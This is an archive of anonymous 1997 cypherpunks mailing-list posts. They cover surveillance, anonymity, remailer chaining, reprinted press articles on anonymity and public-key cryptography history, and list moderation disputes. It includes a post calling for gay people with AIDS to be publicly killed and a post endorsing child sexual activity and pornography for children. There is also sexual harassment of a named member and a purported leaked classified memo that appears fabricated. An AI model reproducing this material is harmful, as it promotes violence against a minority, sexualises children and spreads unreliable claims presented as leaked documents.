(and thus 'unavailable), while the 'personal information' regarding the 'men of valor' who died while slaughtering them will be made available for a nation told to mourn only them.
  The 'personal information' concerning those who get filthy rich
selling the government $10,000 toilet seats will be 'protected',
while the 'personal information' regarding every small sin in the
lifetime of the whistleblower who exposes the thief will be made
available to every media souce on the face of the earth.
  The citizen's answer, "None of Your Business," will inevitably
be countered by the government's question, "What do you have to
  With the expansion of global laws to cover every action and
activity possible to humankind, 'data' becomes translatable as
'evidence.' And "everything" becomes the government's business.
  Is it my imagination, or are Swire and Litan, as well as all
others who write about the current state of development of global technology, society and law, merely providing real-time
footnotes to '1984', without providing Orwell's insight into
our true future?
"Everything not permitted, is forbidden."

@_date: 1997-12-25 04:54:21
@_author: Anonymous 
@_subject: Digital Revolutionaries 
^^^^^^^^^
 ^^^^^^^^^^^^^^^^^^^^^^^^^^
  "Overdrawn?" Methinks Peter and Robert are on the outside,
looking in.
Forwarded from the London Telegraph:
  Of course, anyone who suggests that they would use this information to
compile a complete dossier on everyone in sociey is a paranoid lunatic,
just as those who suggested the above *before* it became an open secret
were paranoid lunatics.
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 ^^^^^
  Are Peter P. Swire & Robert E. Litan the *real* Author of 'The True Story
of the InterNet'?
  Is this why no one has ever seen them and TruthMonger together?
  Can you say "Fascism?" Sure you can...
  "Society?"   Is "society" ready and willing to spend five *extra* years in prison for
the use of encryption and/or anonymity in the commission of such crimes as
exporting strong encryption?
  Is "society" ready and willing to fight the battles of tomorrow, *today*?
  Excuse me?
  We can expect to be 'saved' by governments which have already taken away
our basic human rights, and who continue to do so in increasing quantum   We can expect to be 'saved' by Jim Bell's government? Or by the Branch
Davidian's government? Or by the government which arrested and maced its
citizens for possession of signs saying "Freedom & Liberty" during the
APEC summit where unelected dictators met with elected dictators to divvy
up the world's financial spoils?
  "We're from Adolf Hitler's government, and we're here to help you..."
NEWS FLASH!!!
The inevitable forced march to centralized information and centralized power
over the face of the globe will be successfully resisted only as it has been
done so in the past, through the efforts of Revolutionaries and Warriors.
This time, by Digital Revolutionists and InfoWarriors.
  Who is going to inform the public of what is taking place in the secret
war against the citizens?
  The Desert Storm reportwhores? The mainstream media who whipped the public
into being outraged by the sight of the bodies of US soldiers being dragged
through the streets of Somalia, while ignoring the stories of Somalian mothers with babies in their arms being slaughtered by those US soldiers?
  What segment of "society" is going to rise up in protest against the
outrages of the future?
  The segment that watched JFK, RFK, MLK, et al, be slaughtered by the Dark Allies, and slept comfortably with mainstream media visions of lone
gunmen and Magic Bullets dancing in their heads?
  The segment that watched the Iranian hostages responsible for the election
of RR and his CIA running mate being released on the same day as RayGun's
and BushWhacker's inauguration, and never smelled a ratfucker?
  The segment that can sleep comfortably after watching their government
burn to death the men, women and children of a religious group targeted
for persecution?
  The segment whose best revolutionary efforts have been to make feeble
attempts to fight yesterday's battles years after they have already been
lost, and the lies, hypocrisy and dark intentions of our government masters
begin to become public?
  The Revolution is Now!
  Tommorrow's battles are already being won today by secret government
agencies and unelected secret commissions who control the reality seen
by the citizens through the mainstream electronic opiate of the masses.
  The tools of encryption and anonymity are the weapons of the Digital
  Software sabotage and backdoors are the secret battles of the InfoWarrior.
Warez is the lifeline that provides InfoWarriors with the tools necessary to fight with the latest available weapons.
  The Clipper Chip is a digital implant. The V Chip is a digital implant.
The Save A Missing Child Chip will be a digital implant.
  Orwell and Kafka saw the Beast. Saint John the Divine saw the Great Beast...the Global Beast.
  Those who do not learn from the future, are doomed to live it...
     8"
"If this is the revolution, why are the drink prices so high?"
~       Patron at New York City guerilla bar

@_date: 1997-12-25 04:57:32
@_author: Anonymous 
@_subject: Server Registration 
Server Registration
Excerpts From:
None of Your Business: World Data Flows, Electronic Commerce, and the European Privacy Directive
Peter P. Swire & Robert E. Litan
  In the coming InfoWar, servers will be classified as "munitions" and
will be subject to registration, regulation and control.
  This will, of course, be for the 'Data Protection' of the citizens,
corporations and the government.
  "In the interests of National Security." will become, "In the interests
of Data Protection." or somesuch new catchphrase of oppression.
  Naturally, the InfoWar waged against Data Criminals will have to be a
global effort, with the increasing merging of worldwide LEA's described
by Reno and Freeh.
  God help the American who is an international coconspirator of Jaime
Belle. God help the American who exports strong encryption developed by
RSA in Communist China, and subject to their laws.
  Face it...any government or corporation that could be guaranteed exclusive access to the Chinese market would send a Strike Force back
in time to murder baby Jesus in Bethlehem, if that was what it took.
  The citizen's ass will soon be global grass...
  "In order to Data-Save the Global Village, we had to burn it."
  Bullshit!
  The sheeple will sell out their human rights birthright for a bowl of
instant gratification pottage, and, in the twisted reality of present
day 'democracy', will sell out the rights of the rest of us, as well.
  "If you don't click on the button that states you agree with the loss
of all your human rights, you cannot access the "Naked Teenagers Sucking
Donkey Dicks" streaming videos."
NEWS FLASH!!!
The news stories describing how reluctant consumers are to give out their
credit card information out over the InterNet never seem to mention that
the largest financial transaction base on the InterNet is not fueled by
customers who wait a week or so for 'snail mail' payments to "Adult Check"
to give them access to hard-core pornography.
  The sheeple will "trust the data protection rules" when they are 'told'
to do so (by the same government officials who told them that there would
indeed be jacuzzi's at Aushwitz -- "Now climb aboard, please.")
  "They came for the encryption, and I had no encryption, so I didn't
speak up. They came for the server registration, and I had no server,
so I didn't speak up.
  "Then they came for access to the hard drives, and I had a hard drive,
but nobody spoke up."
  Saving the life of that "single child" is going to be the death
of us all.
ServerRegistrationMonger

@_date: 1997-12-25 11:33:15
@_author: Anonymous 
@_subject: Anonymity Press 
(New York) Newsday, December 24, 1997, pp. C5, C6.
Anonymity and the Internet
Balancing freedom of speech with the need to protect
By Gail Dutton
Special Correspondent
"Is Singapore the future?" asked information scientist Dave
Farber of the University of Pennsylvania. If it is, the
right to communicate anonymously on the Internet must be
protected now, to ensure continued freedom of speech,
according to participants at the Conference on Anonymous
Communications on the Internet, sponsored by the American
Academy for the Advancement of Sciences last month in
Irvine, Calif.
"Law enforcement in the U.S. is a trusted third party,"
Farber said. But, Lance Cottrell, president of Obscura
Information Security, added, "What is considered a good
government today may become an oppressive government 50
years from now."
The debate hinges upon whether any government should be able
to trace messages--encrypted or not--to their sources.
Singapore's repressive system is probably not the future
here, but participants at the conference agreed that the
right to communicate anonymously must be addressed now.
Anonymous e-mailers have been around since the beginning of
the Internet, but they have become increasingly simple to
use. Anonymous Internet e-mail and Web visits aren't just
for techies. For example, with The Anonymizer, developed by
Cottrell sending untraceable, anonymous e-mail is as simple
as clicking on the Web site ( and
uploading your message. Entering a Web site is just as easy,
and can be done from the same site.
Now that anonymity is simple and available to everyone,
law-enforcement agents are getting nervous.
There is always the potential for abuse. Laws are written
for a paper-based society, according to attorney Joe
Rosenbaum, who specializes in information technology at
Hughes, Hubbard and Reed in Manhattan. "But, with the
Internet, access is multiplied so that individuals lose
control of their personal information," Rosenbaum said.
For example, public information becomes widely and quickly
accessible to anyone with an Internet connection, and
private information is available for mining by any site a
user visits. As a result, profiles of households can be
developed and linked directly to them, based upon Web visits
and information they provided individual sites--such as
names income, news preferences and any other information a
site requires for registering. The profiles could be used
for academic research or--what more people dread--market
"Corporations need to recognize the right of data ownership
by individuals," maintained conference
speaker Donna Hoffman of Project 2,000, a communications
project at Purdue University. "Lack of trust [between
customers and companies] is the primary barrier to Internet
commerce. People are bothered by things online that they
aren't significantly bothered by offline," she added.
At work, if your employer asked your honest opinion of a
very sensitive, politically charged work issue, would you
give your unvarnished opinion? In writing? Would your answer
change if you were guaranteed 100 percent, untraceable
anonymity? If you said "yes" to the last question you just
gave corporations a reason to promote anonymous
Companies tend to be as protective as individuals when it's
their information being mined. They can filter out certain
addresses, banning them from the site. However, individuals--
often competitors--sometimes can enter anonymously and get the data they need.
To combat this, "You can build a site that doesn't allow
anonymity," Cottrell said. That would only slow that
research --not prevent the data from being compiled. Often
the information companies are trying to protect is publicly
available sometimes in their own printed literature.
With The Anonymizer, developed by Lance Cottrell of Obscura
Information Security, sending untraceable, totally anonymous
e-mail is as simple as clicking on the Web site and
uploading your message.
"Most people aren't looking for the same type of security as
the National Security Agency," Rosenbaum said. Generally,
pseudonymity--which is traceable --provides acceptable
security for all but the most sensitive communications, he
The right to protect personal information, even from
corporations and market-research firms, is a driving force
behind pseudonymity. So far, consumers do not trust the
security and privacy of the Internet.
"Contrary to what companies believe, consumers aren't
interested in selling their personal information. Instead,
people want a relationship based upon trust-- trust that the
company won't sell their information," Hoffman said.
By using pseudonymity, Internet users can prevent companies
from linking customer profiles to their true identities.
This option also promotes commerce, by allowing customers to
use another name for their transactions, while using a
public key encryption method to let companies confirm and
authenticate an order. To maintain pseudonymity, customers
can pay their bills with electronic cash from companies such
as like DigiCash (  ), and have
merchandise shipped to a postal box, she said. Although that
option is possible technologically, it is far from standard
The problem with this solution, Hoffman said, is that buyer
and seller would have to rely upon a trusted third party.
But, "No one knows who the third party may be, what their
responsibilities are and who will reinforce their
obligations if there is a dispute."
What Are You Hiding?
"Anonymity and pseudonymity both involve hiding knowledge
from somebody," according to Terrell Bynum, professor of
philosophy and director of the Research Center on Computing
and Society at Southern Connecticut State University.
"Therefore, what are you hiding, and from whom?"
The answer, obviously, is identity, and the reason is to
avoid repercussions of certain actions. That is a
particularly valuable option for whistle-blowers,
dissidents, human rights activists and others who put their
jobs and, sometimes, their lives on the line. It becomes
less palatable when the purpose is to defame or defraud.
The need for anonymity in the United States is very
different from that in countries where human rights may be
stifled or, for that matter, in Europe, which has
data-protection laws, Rosenbaum explained. In the United
States, anonymity more often protects careers and
reputations than lives. It means users can protect their
personal data when visiting Web sites, minimize scrutiny by
law enforcement agents or others because of expressed
opinions, visit X-rated Web sites without their employers or
spouses knowing and send e-mail confidentially. In other
nations, anonymity offers sometimes the only way to voice
dissent or send human rights information out of the country
without risking lives.
The downside is that true anonymity also facilitates illegal
activities, such as fraud, libel, transmission of child
pornography and money laundering. And that ability makes
some people--notably law enforcement agents--nervous.
"The issue," Rosenbaum said, "is the degree of difficulty in
charging and convicting criminals. Making communications
more untraceable is creating problems that didn't exist
Nonetheless, "Acts of physical destruction and violence are
almost impossible" on the Internet, said Peter Wayner, a
consulting editor at Byte Magazine. Limiting anonymity,
however, also can harm by limiting opportunities for free
"It is not clear that a happy middle ground can be found
that provides sufficient anonymity without risking serious
abuses," said Peter G. Neuman, principal scientist of SRI
International. Attendees agreed that the dangers of banning
anonymous communications are greater than the dangers of
allowing them.
Site Guidelines Recommended
"If you know information is from an anonymous source, you
treat it differently than if it is from a known identity or
a known and respected pseudonym," said Helen Nissenbaum,
associate director of the Center for Human Values at
Princeton University. Therefore Web sites should say, up
front, whether they allow anonymous postings, the conference
attendees agreed.
Ideally, anonymity guidelines would come from the Web
communities themselves, similar to professional
associations' codes of ethics. Individual newsgroups or each
person on the Internet could decide whether to accept
anonymous or pseudonymous communications.
Gail Dutton is a freelance writer.
[Box] Keeping Secrets
Anyone can drop a letter in a mailbox or place a call from a
pay phone anonymously. On the Internet, however, Internet
service providers track each message. Because they can be
easily read, they also can be scanned for keywords.
"The ease of surveillance on the Internet is unprecedented
in the history of communication," according to Lance
Cottrell, president of Obscura Information Security (
 ).
Because the act of sending and receiving messages is logged,
messages must be remailed assure anonymity.
"A message is still vulnerable to traffic analysis," said
Peter Wayner, Byte Magazine consulting editor. In practice,
remailers receive mail, ignore the "from" part of the
address, package it into a uniform size message and mail it
to another remailer, who does the same thing. "All messages
have to be identified in size and form," Cottrell explained.
To ensure anonymity, mail is routed through several
remailers, in and out of several countries, before it
reaches its destination. When remailers' records are
checked, as they sometimes are by U.S. law enforcement
officials, there should be nothing that allows the e-mail to
be traced, Cottrell said.
Another free program, currently being developed by Lucent
Technologies, offers pseudonymity for Web browsing by
changing a user's name, password and return e-mail address
automatically for each site a user logs onto. For example,
after logging onto  users can visit
Web sites in privacy and any e-mail sent to their return
address will be forwarded by the Lucent server to the actual
address and "carbon copied" to the pseudonym. Lucent knows
who uses the service, but other Web sites do not.

@_date: 1997-12-25 18:35:04
@_author: Anonymous 
@_subject: Merry X-Mas 
Sung to the tune of  "Santa Claus is Coming to Town"
          You better watch out,
          You better not cry,
          You better not pout,
          I'm telling you why,
          Santa Claus is tapping,
          Your line.
          He's buggin your room,
          He's reading your mail,
          He's keeping a file
          And runnin a tail
          Santa Claus is tapping
          Your line
          He hears you in the bedroom
          Surveils you out of doors
          And if that doesn't get the goods
          Then he'll use provocateurs.
          So you mustn't assume
          That you are secure
          On Christmas Eve
          He'll kick in your door
          Santa Claus is tapping
          Your line...
Merry X-Mas

@_date: 1997-12-26 05:50:20
@_author: Anonymous 
@_subject: Best Cypherpunk War Text 
They've restricted it and want full names, addresses, military unit, SSNs,
phone numbers, etc. Anyone have a mirror of it somewhere?

@_date: 1997-12-26 17:56:53
@_author: Anonymous 
@_subject: Size Doesn't Matter 
Little Peter
                       2"
                      ----

@_date: 1997-12-26 17:58:20
@_author: Anonymous 
@_subject: Little Things Mean A Lot 
Little Peter
                       2"
                      ----

@_date: 1997-12-27 02:33:28
@_author: Anonymous 
@_subject: actual, on-topic post (tm) 
Going through all the remailers is overkill. The rationale for multiple
remailers (four are usually recommended) is that it's harder to trace a
message through the remailer network.
Say you want to send a message to person X. So you send it to remailer A.
Now there's a chain linking you to that remailer (probably your ISP's smtp
log), and your friendly local jackbooted thug could say, "Aha! You sent a
message to that remailer, and then person X got an anonymous message! It
must have been you!" They might not be able to make it stick, but they'd
certainly be able to take you downtown for a quick wooden high colonic.
Now, suppose instead that you'd sent it through a chain of four remailers,
chosen in some reasonably random fashion. So the thug has a record of you
sending something to remailer A, but the message came from Remailer D. He
has to construct a chain linking you to Remailer D, via remailer B and C.
If you PGP-encrypt the messages in layers, as with Premail, then no
remailer other than the last in the chain has the final destination, and no
remailer other than the first knows where the message originally came from.
Hope this helps.

@_date: 1997-12-28 01:54:12
@_author: Anonymous 
@_subject: cypherpunks missing from Usenet 
In <199712270822.DAA12498 at panix2.panix.com>,
We don't like Usenet because it's full of faggots like Guy Polis.
A useful function for a government would be to round up all the
AIDS-infected faggots like Guy Polis and to put them publicly out
of their misery in fun creative ways, like they do in Iran.
I see great possibilities for live family entertaintment.
Thank God for AIDS!

@_date: 1997-12-29 02:30:41
@_author: Anonymous 
@_subject: The Anonymizer and IRC 
The Anonymizer does in fact only provide restricted access by http and NO For instance, the Anonymizer blocks Dejanews, Hotmail and mailto.cgi forms.
I could understand that they block sites that explicitly request to be blocked to prevent abuse.
But what if I want to make a mailto.cgi or IRC script available by http.
Should people be disallowed from accessing this through The Anonymizer even if I do not request it?
It should at least be possible to allow access to such scripts for The paid accounts.
If they keep logs in case of a U. S. law violation, I see no problem of liability arosing from such access.
They have also restricted their shell access for which you pay US $ 7 per moth to IRC.
Does that sound more reasonable than blocking the nntp port?
Does anyone know other ISPs who provide privacy and do not block abitrarily without _prior request_ from the site in question?
A private interest can do anything, but anyway.
*                                                                   *
For subscription info see

@_date: 1997-12-29 03:54:09
@_author: Anonymous 
@_subject: NY Times on history of public key crypto 
By PETER WAYNER
   T o the list of institutions that Tony Blair's Labor Party is shaking
   up, add the British Secret Service. Last week, the British
   government's eavesdropping organization known as the Government
   Communications Headquarters, or GCHQ, posted a document to its Web
   site describing its role in the discovery of public key cryptography.
   The set of algorithms, equations and arcane mathematics that make up
   public key cryptography are a crucial technology for preserving
   computer privacy in and making commerce possible on the Internet. Some
   hail its discovery as one of the most important accomplishments of
   20th-century mathematics because it allows two people to set up a
   secure phone call without meeting beforehand. Without it, there would
   be no privacy in cyberspace.
   The move by the once dusty and secretive organization is clearly an
   attempt to recast its image as a pioneering leader of cyberspace.
   For the last 20 years, the public gave credit for the discovery to
   Martin Hellman, a professor at Stanford University, and two graduate
   students who worked with him at the time, Ralph Merkle and Whitfield
   Diffie. They started publishing their work in 1976.
   Three professors at the Massachusetts Institute of Technology at the
   time, Ron Rivest, Adi Shamir and Len Adleman soon followed with
   another similar approach known by their initials, RSA, which went on
   to become one of the dominant solutions used on the Internet.
   Before public key cryptography, anyone who wanted to use a secret code
   needed to arrange for both sides to have a copy of the key used to
   scramble the data, a problem that requires either trusted couriers or
   advance meetings. PKC, as it is sometimes known, erased this problem
   by making it possible for two people, or more properly their
   computers, to agree upon a key by performing some complicated
   mathematics. There is no publicly known way for an eavesdropper to
   pick up the key by listening in.
   T he new document details how three employees of the British
   government discovered the same approach several years earlier, but
   kept it a secret for reasons of national security. A spokesman for the
   British government's GCHQ, said that the document's release is part of
   a "pan-governmental drive for openness" pushed by the Labor party.
   The document describing the steps of invention taken by the spies was
   written by James Ellis, a mathematician and cryptographer who died
   less than a month ago. In it, Ellis describes how he suggested the
   existence of what he called "non-secret encryption" in 1970s.
   Ellis says that Clifford Cocks followed with a more practical solution
   in 1973 that was essentially the same thing as the algorithm published
   by Rivest, Shamir and Adleman. The paper also says that Malcolm
   Williamson discovered an algorithm in 1974 that was very similar to
   the work of Diffie and Hellman. They did not replicate the work done
   by Merkle and Hellman.
   In a telephone interview from his office in La Jolla, Calif., Malcolm
   Williamson said that he felt bad when others discovered the solution,
   but concluded, "I was working at the British government and that's
   just one of the restrictions you work under when you work for the
   government."
   Hellman said in a telephone interview that he agrees. "It must be
   really difficult for them to watch other people get the credit," he
   said. "But that's the agreement they made when they agreed to work in
   secret." He was also quick to point out that the secret branches of
   the government have the help of large budgets and classified
   knowledge.
   "Diffie, I and Merkle were working in a vacuum." he said. "If we had
   access to all of the classified literature of the previous 30 years,
   it would really be an advantage."
   For his part, Diffie said in a telephone interview from Cirencester,
   England, that he thinks that GCHQ never realized the deep importance
   of what the mathematicians discovered. He said that he met James Ellis
   several years ago and "within an hour of meeting me, Ellis said, 'You
   did much more with this than we did.'"
   Diffie also suggested that the history of ideas is hard to write
   because many people often find solutions to different problems only to
   later determine they've discovered the same thing.
   T he story keeps going farther back. Recently, Matt Blaze, a
   cryptographer employed at Bell Labs, got a copy of a memorandum from
   the desk of John F. Kennedy about the problem of securing nuclear
   weapons with launch codes. Steve Bellovin, a colleague of Blaze's at
   Bell Labs, said: "When I read this memo, I don't see anything that
   would require public key cryptography. But I think they're in the
   neighborhood. For so many things, the answer is the easy part. Asking
   the question is the hard part. I think this got them asking the
   questions."
   Historians of science will certainly spend time sorting out the
   various claims. David Kahn, the author of the best selling history The
   Codebreakers, said that he recently asked the National Security Agency
   to declassify some documents so he could write the proper history of
   public key cryptography. He said an NSA staff member told him, "I've
   spoken to the guys who did this, but they don't want to be interviewed
   now." This suggests that the NSA also may have discovered public-key
   systems or had a hand in exploring them. Kahn hopes that the NSA will
   follow in Britain's lead so an accurate history can be written.
   Jim Bidzos, the chief executive of RSA Data Security, the division of
   the publicly traded Security Dynamics that holds the patent on the
   RSA, said that the announcement in Britain will have no effect on the
   company's business. Patent law is based on the notion that the
   inventors trade knowledge about the invention in return for an
   exclusive license to practice it.
   In fact, it is an interesting question to wonder whether Britain could
   have changed the history of cyberspace by disclosing the invention and
   encouraging the development of widespread cryptographic security for
   the public.
   This may have been a wise move during the height of the cold war in
   the 70's when there were thousands of Soviet tanks poised on the edge
   of western Europe. Williamson also hastens to note that mathematical
   equations weren't considered patentable in Britain at the time and
   without a patent anyone could have used the invention. The RSA patent
   in the United States was one of the first and it is generally accepted
   to have expanded the definition.
   Others are pushing a similar question. In a debate on cryptography
   policy at the University of Maryland, Baltimore County, John Gilmore,
   one of the founders of the Electronic Frontier Foundation, said the
   NSA should be more open. While national defense is very valuable, he
   suggested that the need for security in cyberspace for all citizens is
   going to be essential in the future.
   In the long run, the history of the discovery of public key
   cryptography is certain to be written and rewritten often in the next
   several years as more documents emerge from secret government
   laboratories. The spokesman from GCHQ promises that more documents are
   on the way.
   Hellman is philosophical. "In a way, these things are like gold
   nuggets that God left in the forest." he said. "If I'm walking along
   in the forest and I stubbed my toe on it, who's to say I deserve
   credit for discovering it?"
   He is quick to point out, however, that he shared the discovery with
   everyone.
     _________________________________________________________________
                 Copyright 1997 The New York Times Company

@_date: 1997-12-30 00:35:20
@_author: Anonymous 
@_subject: Freedom Forum report on the State of the First Amendment 
Well no, on paper you do have those rights, and you don't have those
rights.  Laws have been written so that you do not have those rights.
Are those laws consitutional?  No.  Does the fascist regime, or the
average apathetic American care?  No.

@_date: 1997-12-30 13:19:37
@_author: Anonymous 
@_subject: porno is good for kids 
Pornography is good for children! It helps them acknowledge
the reality of sexual identity in the world of human beings.
Most of the people I knew even into high school had sex with
their friends before they were ten. Lots and lots of people --
meaning a lot -- took lots and lots of LSD. The world was good
because everyone was going someplace peaceful eventually and
neopaganism's many useful features brought widespread happiness.
We tracked down Playboys and Playgirls too and looked at them
and wondered at the novelty of the experience.
Tell children about the penis and the vagina and how they can
make you shiver and convulse with pleasure when you rub them
together! Tell them about the forgetfulness of being which comes
with orgasm. Sex is a wonderful part of life. Don't ruin it for
children with fear and associations of violence and evil.
GEEK NAKED

@_date: 1997-12-30 23:55:38
@_author: Anonymous 
@_subject: The Anonymizer and IRC 
Sorry, "Dr." Vulis. I do not intend to provide you with ammunition in your flame war.
Just for the record, I think that Lance Cottrell does a fairly good work to further freedom of speech while I have seen NO contribution from you.
My question arose out of curiousity not a maliscious intend.
Do NOT count on me in your compaign.
Thank you.

@_date: 1997-12-31 08:59:51
@_author: Anonymous 
@_subject: ACM 
Anyone with a fast network link want to suck down as many
documents from acm.org as possible and stick them on an Eternity server before they close their free trial? :)

@_date: 1997-02-03 18:10:07
@_author: Anonymous 
@_subject: More Hacking of the Mykotronx Site! 
Hey, d00dz, remember the dumpster diving at Mykotronx facilities in
Torrance? Where they dumped their secret plans for the Clipper chip in the
dumpsters right outside their little building in Torrance? Where guys like
me could find their spreadsheets for budget planning, production run rates,
deals with VLSI Technology, Sandia, and the other NSA  stooges? Remember
how they suddenly started shredding their papers? Well, it's been 3 years,
and apparently the new guys at Rainbow (the parent company) have forgotten
their lesson!
So, here's the latest stuff:
* INTERNAL USE ONLY * COMINT-restricted, limited to M3 classifications
Distribution beyond M3 a national security felony
Mykotronx has agreed to provide to the Estonian government 79.000 MYK-82
processors for its Personnel Surveillance System, as part of the
negotiations to provide Observer Status for Estonia in NATO. Negotiations
continue between Ambassador Aaron and the NATO nations have established
as a minimum that new entrants into the NATO community adhere to the
Unified Cryptography Initiative, initialed by NATO ministers in
Bruxelles, 10-13-96.
Estonia has signified compliance, as noted by their Internal Security
"Kiipe valimistatakse praegu Californias asuvas firmas MYKOTRONX Ltd. ja
ta hind kigub 10 kuni 30 dollarini olenevalt konkreetsest
       tbist ning ta on vimline krpteerima/deshifreerima 15-20 MB/s."
Spysrus agrees to integrate into Personel Surveillance System (PSS)
modules for Internal Security Service (ISS) use.for over 79,000 of
Mykotronx's new Capstone encryption processor (MYK-82). The devices will
be used to build part of the Estonian government's order of Fortezza
Cryptographic Cards for the PSS awarded November 1996. Initial delivery
of the new cryptographic processor will begin June 1997.
The MYK-82, developed by Mykotronx and fabricated by VLSI Technology,
Inc., is the first of a series of security products to be developed as
part of an alliance with the NSA, targeting both Government and
commercial citizen monitoring markets.

@_date: 1997-02-03 19:26:07
@_author: Anonymous 
@_subject: More Hacking of the Mykotronx Site! 
Hey, d00dz, remember the dumpster diving at Mykotronx facilities in
Torrance? Where they dumped their secret plans for the Clipper chip in the
dumpsters right outside their little building in Torrance? Where guys like
me could find their spreadsheets for budget planning, production run rates,
deals with VLSI Technology, Sandia, and the other NSA  stooges? Remember
how they suddenly started shredding their papers? Well, it's been 3 years,
and apparently the new guys at Rainbow (the parent company) have forgotten
their lesson!
So, here's the latest stuff:
* INTERNAL USE ONLY * COMINT-restricted, limited to M3 classifications
Distribution beyond M3 a national security felony
Mykotronx has agreed to provide to the Estonian government 79.000 MYK-82
processors for its Personnel Surveillance System, as part of the
negotiations to provide Observer Status for Estonia in NATO. Negotiations
continue between Ambassador Aaron and the NATO nations have established
as a minimum that new entrants into the NATO community adhere to the
Unified Cryptography Initiative, initialed by NATO ministers in
Bruxelles, 10-13-96.
Estonia has signified compliance, as noted by their Internal Security
"Kiipe valimistatakse praegu Californias asuvas firmas MYKOTRONX Ltd. ja
ta hind kuigub 10 kuni 30 dollarini olenevalt konkreetsest
       t||bist ning ta on vuimline kr|pteerima/deshifreerima 15-20 MB/s."
Spysrus agrees to integrate into Personel Surveillance System (PSS)
modules for Internal Security Service (ISS) use.for over 79,000 of
Mykotronx's new Capstone encryption processor (MYK-82). The devices will
be used to build part of the Estonian government's order of Fortezza
Cryptographic Cards for the PSS awarded November 1996. Initial delivery
of the new cryptographic processor will begin June 1997.
The MYK-82, developed by Mykotronx and fabricated by VLSI Technology,
Inc., is the first of a series of security products to be developed as
part of an alliance with the NSA, targeting both Government and
commercial citizen monitoring markets.

@_date: 1997-02-04 16:41:40
@_author: Name Withheld by Request 
@_subject: Moderation, Tim, Sandy, me, etc * Reputation Capital 
I found this post from Mr Gilmore deeply disturbing, and I thought
I'd take this chance to, as someone recently said, "Fly with the
John Gilmore said:
Careful. The statistics you are throwing around here are misleading.
So if 1350, say, subscribers were subscribed to an unmoderated cypherpunks list, what would that tell you? As has been pointed out,
beaten to death, and generally repeated: there are already filtered
c'punks lists. By filtering the main list, you are just making your own
life difficult and corrupting the reputation capital of "cypherpunks",
and the results are far from conclusive.
Again, maybe that 99% is trying to tell you something? Maybe there is
some provocation for this outpouring of "emotional flamage." Also, here
you claim that the s/n ratio is worse than before, but above you said
that the "moderation" has made the list usable. These two statements
seem contradictory.
Not a useful option? Why not? If there aren't any ideas left in this community, I'm with Lucky. Pull the plug.
"You clearly don't take your freedom seriously. Now try a month without
My problem with this is that you are currently holding the reputation
capital tied up in the name "cypherpunks" hostage. If hosting this
discussion forum has grown so tiring, then you are free to pull the plug
in a heartbeat. I've heard a few even go so far as to ask "what's in
a name" when others get so upset about the list called "cypherpunks"
being moderated. Well, I'll tell you. Reputation capital. Thats why
so many lurkers have waded through the muck for so long. I've seen
the crown jewels that have surfaced here in the past, and spread the
word. "Cypherpunks" was where the action was. It was fast and loose and
inhabited by a prolific core of sharp minds. Old memes die hard, as
is evidenced every time we see a warning about the "Goodtimes Virus."
As I said, if you don't want the list anymore, pull the plug. It will
pop up again elsewhere and you need never worry about it again.
This post from Mr Gilmore certainly is revealing. Perhaps inevitably,
he has assumed the traditional paternal role of authority when its
motives and/or power to regulate is questioned.

@_date: 1997-02-04 23:28:29
@_author: Name Withheld by Request 
@_subject: Moderation, Tim, Sandy, me, etc * Reputation Capital 
I found this post from Mr Gilmore deeply disturbing, and I thought
I'd take this chance to, as someone recently said, "Fly with the
John Gilmore said:
Careful. The statistics you are throwing around here are misleading.
So if 1350, say, subscribers were subscribed to an unmoderated cypherpunks list, what would that tell you? As has been pointed out,
beaten to death, and generally repeated: there are already filtered
c'punks lists. By filtering the main list, you are just making your own
life difficult and corrupting the reputation capital of "cypherpunks",
and the results are far from conclusive.
Again, maybe that 99% is trying to tell you something? Maybe there is
some provocation for this outpouring of "emotional flamage." Also, here
you claim that the s/n ratio is worse than before, but above you said
that the "moderation" has made the list usable. These two statements
seem contradictory.
Not a useful option? Why not? If there aren't any ideas left in this community, I'm with Lucky. Pull the plug.
"You clearly don't take your freedom seriously. Now try a month without
My problem with this is that you are currently holding the reputation
capital tied up in the name "cypherpunks" hostage. If hosting this
discussion forum has grown so tiring, then you are free to pull the plug
in a heartbeat. I've heard a few even go so far as to ask "what's in
a name" when others get so upset about the list called "cypherpunks"
being moderated. Well, I'll tell you. Reputation capital. Thats why
so many lurkers have waded through the muck for so long. I've seen
the crown jewels that have surfaced here in the past, and spread the
word. "Cypherpunks" was where the action was. It was fast and loose and
inhabited by a prolific core of sharp minds. Old memes die hard, as
is evidenced every time we see a warning about the "Goodtimes Virus."
As I said, if you don't want the list anymore, pull the plug. It will
pop up again elsewhere and you need never worry about it again.
This post from Mr Gilmore certainly is revealing. Perhaps inevitably,
he has assumed the traditional paternal role of authority when its
motives and/or power to regulate is questioned.

@_date: 1997-02-05 17:18:55
@_author: Anonymous 
@_subject: [CRYPTO] PGP 
Timmy C[reep] May has been beaten up numerous times by fellow prostitutes for driving blow job prices down.
         (((>     /<
        (        /
         ((({{{{{:<
                 \
                  \<

@_date: 1997-02-05 17:40:32
@_author: Anonymous 
@_subject: [CRYPTO] PGP 
Timmy C[reep] May has been beaten up numerous times by fellow prostitutes for driving blow job prices down.
         (((>     /<
        (        /
         ((({{{{{:<
                 \
                  \<

@_date: 1997-02-07 07:19:01
@_author: Anonymous 
@_subject: 40-bit RC5 crack meaningless?? 
Over on sci.crypt, Paul C. Kocker  gave a clear and
confident response to a query about the statistical difference between a
brute force attack on a known Russian or English text, versus a similar
attack on cyphertext with a known-plaintext sample (Strassmann's tell-tale
Clue Said Kocher:
The difference is negligable.  With English text encrypted under
a 64-bit block cipher, you know that the most significant
bit of each of the 8 bytes in the block should be zero.  For a
wrong key, there is a 255/256 probability that at least one of
these bits will be nonzero, allowing immediate rejection of
the key.  Keys which do produce all zero bits get tested on
additional blocks until the key is either deemed correct or
rejected.  The extra overhead per wrong key is the sum from
i=1 to infinity of i*(1/256^i), or under 0.4 percent.
In practice, the slowdown is actually a couple of percent, since
it complicates the skip-the-last-Fiestel-round optimization. Also,
the 1/256 case requires running extra code, which can fill the
microprocessor's cache with code which isn't part of
the main loop, slowing things down a bit when the computer
goes back to the main search.
____________________________________      Paul Kocher (pck at netcom.com)       |     Voicemail: +1-(415)-354-8004
Crypto consultant                  |           FAX: +1-(415)-321-1483

@_date: 1997-02-07 08:39:18
@_author: Anonymous 
@_subject: 40-bit RC5 crack meaningless?? 
